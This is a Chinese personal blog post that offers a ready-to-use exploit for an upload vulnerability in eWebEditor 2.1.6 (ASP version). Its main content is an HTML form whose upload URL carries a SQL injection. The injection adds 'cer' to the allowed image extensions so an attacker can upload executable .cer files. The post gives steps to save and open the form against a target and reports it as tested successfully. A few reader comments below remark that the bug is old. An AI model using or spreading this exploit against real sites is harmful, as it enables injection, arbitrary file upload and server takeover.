夜火博客 个人的碎碎念收集箱

eWebEditor 2.1.6 asp版 上传漏洞利用程序

eWebEditor 2.1.6 asp版 上传漏洞利用程序,修改上传地址保存为HTM文件,打开可以直接上传CER文件,测试成功。上传后地址看源文件。

<H1>eWebEditor 2.1.6 asp版 上传漏洞利用程序----</H1><br><br>
<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

留言列表
nuke
nuke 这个漏洞出来很久了 怎么最近又炒热乎了?  回复
xloong
xloong 老洞新看,温故知新,....。  回复
nuke
nuke 这个漏洞最早是一个非安全界人士发掘的但是我测试成功率低的可怜不知道是不是人品问题  回复
发表评论
来宾的头像